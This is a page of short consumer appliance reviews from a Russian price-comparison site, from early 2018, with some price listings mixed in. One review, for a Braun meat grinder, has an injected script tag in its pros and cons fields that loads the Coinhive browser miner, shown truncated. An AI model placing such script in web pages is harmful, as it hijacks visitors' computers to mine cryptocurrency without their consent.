Omar.ru  — лучшие цены в интернете  
Например: Кондиционеры, Телевизоры
Москва
Москва

Выбор региона

Если вы хотите посмотреть предложения магазинов из других регионов воспользуйтесь формой ниже.
Введите регион:
- -
Omar.ruГлавная » Отзывы

Отзывы владельцев техники

Разделы
    Все
    Игорь, 15 апреля 2018 г.

    Отзыв о сетевой плате CNet P Pro-200

    оценка

    10
    Модель: CNet P Pro-200
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Работает как с новыми, так и со старыми компами
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: надёжная
    МОЙ СОВЕТ: Я рекомендую эту модель.
    DVD-плеер Philips dvp 2850/51
    Цена: 3 390 руб.
    RBT.ru Челябинск
    Philips DVD плеер Philips ..
    Цена: 3 390 руб.
    Интернет-магазин Philips
    DVD-плеер Philips dvp 2850/51
    Цена: 2 590 руб.
    RBT.ru Екатеринбург
    DVD-плеер Philips dvp 2850/51
    Цена: 2 690 руб.
    RBT.ru Новосибирск
    DVD-плеер Philips dvp 2850/51
    Цена: 2 865 руб.
    RBT.ru Кемерово
    DVD-плеер Philips dvp 2850/51
    Цена: 3 390 руб.
    RBT.ru Ноябрьск
    Елена, 06 апреля 2018 г.

    Отзыв о стиральной машине Korting KWA 50085 R

    оценка

    10
    Модель: Korting KWA 50085 R
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Одни плюсы
     
    НЕДОСТАТКИ
    нет
    МОЁ МНЕНИЕ: Долго решалась на столь недешевую стиральную машинку, но с учетом того, что она стирает да еще и сушит белье, то вопрос отпал сам собой. Загрузка позволяет стирать объемные вещи, такие как пледы. одеяла, подушки и много другое. Я ее вообще не жалею, стираю Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Дмитрий, 03 апреля 2018 г.

    Отзыв о микроволновой печи Polar W707M-17

    оценка

    10
    Модель: Polar W707M-17
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: Отличная сборка. Ничего не ломалось, работает до сих пор. Со своей задачей (разогрев и разморозка) справляется без проблем. Решил написать отзыв так как продал ее на вторичном рынке. Обычная безпроблемная микроволновка. Сказать даже нечего...)))
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Юрий, 30 марта 2018 г.

    Отзыв о телевизоре Akai 32PDP-501P

    оценка

    8
    Модель: Akai 32PDP-501P
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    большой экран,качество,входов много,хорошая теплоотдача
     
    НЕДОСТАТКИ
    немного бликует на солнце,фирма акаи(серебристая) на телевизоре отвлекала на фоне черного экрана-заретушировал,на Подробнее
    МОЁ МНЕНИЕ: без проблемный
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Вера, 27 марта 2018 г.

    Отзыв о стиральной машине Zanussi FLS 872 C

    оценка

    10
    Модель: Zanussi FLS 872 C
    Срок использования: больше 5 лет
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: В эксплуатации 17 лет,8 лет назад замена двигателя,до сих пор работает.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Евгений, 25 марта 2018 г.

    Отзыв о стиральной машине Zanussi WD 1601

    оценка

    10
    Модель: Zanussi WD 1601
    Срок использования: больше 5 лет
    Количество поломок: было 4 поломки
    ДОСТОИНСТВА
    Шикарная машина за умеренные деньги
     
    НЕДОСТАТКИ
    Отсутствуют индикаторы текущих этапов выполнения программы, отсутствует индикатор включения нагрева воды. Снята с Подробнее
    МОЁ МНЕНИЕ: По-настоящему "умная" машина, вплоть до того, что можно доложить забытую вещь в процессе стирки и если воды не много, дверцу можно будет открыть сразу же. Стирает идеально direct spray - супер! Дизайн очень оригинальный- не надо сгибаться в три Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Анатолий, 06 марта 2018 г.

    Отзыв о мониторе BenQ FP767-12

    оценка

    10
    Модель: BenQ FP767-12
    Срок использования: больше 5 лет
    Количество поломок: была 2 поломки
    ДОСТОИНСТВА
    вечный монитор
     
    НЕДОСТАТКИ
    не нашел
    МОЁ МНЕНИЕ: Отличный безотказный монитор. Эксплуатирую его уже больше 20 лет (среднее время работы - 1 час в сутки) за это время было всего 2 поломки инверторов экрана.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Дина, 05 марта 2018 г.

    Отзыв о швейной машинке Jaguar 6434

    оценка

    10
    Модель: Jaguar 6434
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    нить не рвет, строчки ровные
     
    НЕДОСТАТКИ
    нет
    МОЁ МНЕНИЕ: После старой бабушкиной швейной машинки моя новая Jaguar конечно просто космос. Меня сразу продавец предупредил, что лучше на ней плотные ткани не шить, а мне сразу надо было новые джинсы подшить мужу. Рискнула-прошила, всё отлично. Ни разу машинка не Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Виктор, 03 марта 2018 г.

    Отзыв о стиральной машине Ardo TL 800 EX

    оценка

    10
    Модель: Ardo TL 800 EX
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Компактность, нет лишних примочек, проста в эксплуатации.
     
    НЕДОСТАТКИ
    За 9 лет эксплуатации, пока, нет.
    МОЁ МНЕНИЕ: Машинку эксплуатируем 9лет. Никаких проблем не возникало. Трудяга. Необходимо только не забывать элементарные рекомендации по уходу.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Владимир, 27 февраля 2018 г.

    Отзыв о электробритве Panasonic ES 8017

    оценка

    10
    Модель: Panasonic ES 8017
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Все!!!
     
    НЕДОСТАТКИ
    Ну, разве что, немного занудливый звук(как комар, когда спишь).
    МОЁ МНЕНИЕ: Досталась от родственника, лежала 2 года без использования. Думал аккумуляторы сдохли, но зарядка пошла сразу и все заработало. Правда одной зарядки хватает на 5 раз(по 5 минут). Пишут, что не годится для влажного бритья, а я - бреюсь!!! Не под душем, конечно, Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    UPFOX, 22 февраля 2018 г.

    Отзыв о мясорубке Braun G 1300 K

    оценка

    9
    Модель: Braun G 1300 K
    Срок использования: больше года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
     
    НЕДОСТАТКИ
    <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
    МОЁ МНЕНИЕ: sdg h
    МОЙ СОВЕТ: Я рекомендую эту модель.
    СЕРГЕЙ НЕФЁДОВ, 18 февраля 2018 г.

    Отзыв о электробритве Харьков 6103М

    оценка

    9
    Модель: Харьков 6103М
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    ПРОСТАЯ И НАДЁЖНАЯ МАШИНКА !!!!!
     
    НЕДОСТАТКИ
    НЕ ВИЖУ....
    МОЁ МНЕНИЕ: ОТЛИЧНЫЙ ПРОСТОЙ АППАРАТ ЭКСПЛУАТИРУЮ БОЛЕЕ 15 ЛЕТ В НАСТОЯЩЕЕ ВРЕМЯ ПОЯВИЛСЯ ШУМ ПРИ СТРИЖКЕ.... НАДО СМАЗАТЬ НО ПОТЕРЯЛ СХЕМУ СМАЗКИ .... БЛАГОДАРЮ СПЕЦИАЛИСТОВ ЗАВОДА В ГОР ХАРЬКОВЕ !!!!!!!
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Ррр, 11 февраля 2018 г.

    Отзыв о музыкальном центре LG LM-K 2930 X

    оценка

    10
    Модель: LG LM-K 2930 X
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: отличный центр
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Галина Леонидовна, 09 февраля 2018 г.

    Отзыв о мясорубке Braun G 1300 K

    оценка

    9
    Модель: Braun G 1300 K
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Скорость хорошая, мощная, как на промышленной.
     
    НЕДОСТАТКИ
    Шумит, конечно, здорово, закрываю дверь в кухне.
    МОЁ МНЕНИЕ: Пользуюсь с 2008 года. Немного изменился звук при работе.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Галина, 04 февраля 2018 г.

    Отзыв о пылесосе BORK V601

    оценка

    3
    Модель: BORK V601
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Выполняет все функции, которые должен Не более!
     
    НЕДОСТАТКИ
    Непонятно из чего сложена такая цена
    МОЁ МНЕНИЕ: Пылесосом пользуюсь полтора месяца. Полное разочарование жаль потраченных денег. Можно было купить модель гораздо дешевле, разницы бы не заметила. Обычный пылесос, просто, распиаренный. Вот и я повелась на отзывы. Неспорую, пылесос хорош, но денег таких СОВСЕМ Подробнее
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    Сергей, 30 января 2018 г.

    Отзыв о комплекте акустики для компьютера Magnat Quantum 507

    оценка

    10
    Модель: Magnat Quantum 507
    Срок использования: 4 года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: звук супер
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Алла, 20 января 2018 г.

    Отзыв о стиральной машине Whirlpool AWE 7515

    оценка

    5
    Модель: Whirlpool AWE 7515
    Срок использования: больше 5 лет
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
    Удобная в эксплуатации в небольшой ванной.
     
    НЕДОСТАТКИ
    При открытой крышке после стирки вода стекает и попадает в щель между открытой крышкой и панелью управления, от этого Подробнее
    МОЁ МНЕНИЕ: Удобная,но недостаток из за непродуманности защиты верхней крышки от ржавчины.
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    Ирина, 15 января 2018 г.

    Отзыв о стиральной машине Candy Activa Smart 1040

    оценка

    10
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    ПОКУПАЙТЕ,НЕ ПОЖАЛЕЕТЕ
     
    НЕДОСТАТКИ
    НИ ОДНОГО НЕ НАШЛА ЗА 10 лет,(хотя я еще та противоза)!
    МОЁ МНЕНИЕ: у меня тоже канди вертикалка в 2007 году покупала.За все эти 10 лет стирала как нодо,чисто,вот только не все порошки могла принимать.Только качественными порошками типа лоск,ариэль,персил, для носков миф. Пробовала раз тайд и еще какой то на б бедняжка так Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Геннадий, 12 января 2018 г.

    Отзыв о стиральной машине Hotpoint-Ariston TX 100 EX

    оценка

    10
    Срок использования: больше 5 лет
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
    Все 10 баллов
     
    НЕДОСТАТКИ
    нет
    МОЁ МНЕНИЕ: Работяга с большой буквы.Работает более 15 лет.Одна поломка была, перестал работать слив.В данный момент хочу провести диагностику,если будет еще служить и далее то она останется хозяйкой в нашей кв.и далее.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Бобылев, 08 января 2018 г.

    Отзыв о электробритве Philips Philishave HQ 6890

    оценка

    10
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Работу делает отлично.
     
    НЕДОСТАТКИ
    Не заметил.
    МОЁ МНЕНИЕ: Очень нравится
    МОЙ СОВЕТ: Я рекомендую эту модель.